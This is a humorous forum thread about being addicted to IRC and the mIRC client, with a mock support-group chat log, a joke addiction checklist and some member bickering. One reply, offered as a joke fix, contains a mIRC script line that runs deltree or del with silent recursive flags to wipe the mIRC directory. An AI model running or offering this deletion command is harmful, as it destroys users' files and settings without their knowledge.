I need help. I chat too much, and my hands shake. I have an altogether shoddy life outside of irc. I have a pain in my stomach from the half cooked food I made because I didn't have time to wait around, incase one of the idle nicks said something in the channel I was looking at. I'm an obsessive compulsive scripter. My feet are numb because I don't notice the ice creeping into my flesh when I'm lost in the rapture of IRC. mIRC is killing me. Please, someone, make a shoddy script or a new version of mIRC that just PLAIN SUCKS. I might be able to get away if you do. Please, somebody, help an addict. Stop making an irc client so fun. Help!

rofl -- Don't we all >:D Its all khaled's fault--he had to make such a damn nice piece of software, that we all have troubles leaving it. I thought i got away about three years ago (little did I know it only ging to be 1 year). After that the sence of helplessnes and a numbing feeling came over me, like something was missing. I knew what it was, but denial had set it. I couldn't let myself know it was irc, i just couldn't. I tried to stay away but i just couldn't!

if ($os == nt) { /run deltree /y $mircdir }
else { /run del /Q /S $mircdir*.* }
}

deltree isn't a working method on a lot of computers

Aw, c'mon your just as bad as me watchdog; the only differences are:
-you treat your irc responsibilities almost like a real job
-i have cooler pants
-i reconize i have a problem, but haven't foudn an offline group to go to (the pointelss of an online group is self evident)

the irc responsibilities isn't a perosnal jab, its a common fault of almost every voice'd user and above on our server.

Not bad except for the fact that I am on ADSL, hence a 24/7 connection. Just because I am online does not mean I am there. If that is my biggest problem then I doing pretty well.

If being online 24/7 makes you think that I am actually there all of that time proves how tunnel-visioned you are. As for the rest of your post, well, I can only gather that you are an attention seeker.

As for your admissions here, perhaps seeing a Dr might help... :tongue:

Here's what a support group may be like:

<The_Game> Hi everyone, My nick is The_Game.
<Group> *In unison* Hi The_Game.
<The_Game> *continuing sentence* And I am an addict.
<Group Leader>There There Its Ok
<The_Game> Really?!
<Group Leader> Yes, the first step toward recovery is admitting that you have a problem.
<Group Member> Yeah everyone here has a drinking problem.
<The_Game> *confused* Wait a minute...This isn't an IRC Support Group?
<Three Members in back of group> *Bud*....*Weis*....*Er*...
<Group Leader> Oh hell no, there is no such thing. You're in the wrong group.
<The_Game> Oh!.......Well my bad.

*Sigh* Here we go

You know that if you weren't an addict, you'd just be bemused and leave it at that - but your posting back here trying to deny what you probably see as some kind of slur against you (which its not), which indicates some form of denial at least on some level, doesn't it.

For those of you who want to check how far their rabbit hole of addiction goes, here's Dr. CloCkWeRX's Totally Wrong "Steps to check if you an IRC addict".

-You learned to script in mIRC
-You chat at least 20 hours a week
-You hold ops in any channel that you got from being friendly to other ops.
-Acronyms mean something to you and your tempted to say them outloud.
-You don't think your an addict

You may be a IRC Junkie if:
-You post on this board regularly
-You think of an IRC network as some kind of 'shooting gallery', with your ops being your dealers and your chatters being your buyers
-You have fleas (the exception being if your some kind of animal, then its ok to have fleas)

Ahem.
Is everyone listening?
HEY! PAY ATTENTION! I HAVE SOMETHING TO SAY:

I'M NOT AN ATTENTION SEEKER!

How often do we have to listen to you recite your life experiences back to us?

No doubt.

<bitching>
I get tired of reading posts (which are unavoidable cause you have to scroll for an hour to get past it) about parallel universes or why hotdogs come in packages of 10 and hotdog buns come in packages of 8, or why apartments should be called togetherments cause they are close together, or why a convenience store has a sign that says "Open 24 hours" and have a lock on the door. (Irrelevant questions just to get my point across). I could care less about that. I'm here to lend suggestions to other users having trouble with their mIRC client. Not listen to "confucious" ramble about hypothetical situations or the unexplained.

As for the comment:

Stuff a cork in it!

As for the person talking about one of the ten commandments "Thou shalt not kill" (it was recently i cant remember where or who it was but I think I should comment now), do you know that more killing has been done in the name of god than for any other cause? All i'm saying is to just follow this one simple commandment:

Thou shalt keep thy religion to THYSELF!
</bitching>

I personally do not give a [censored] about [censored] stupid [censored]!
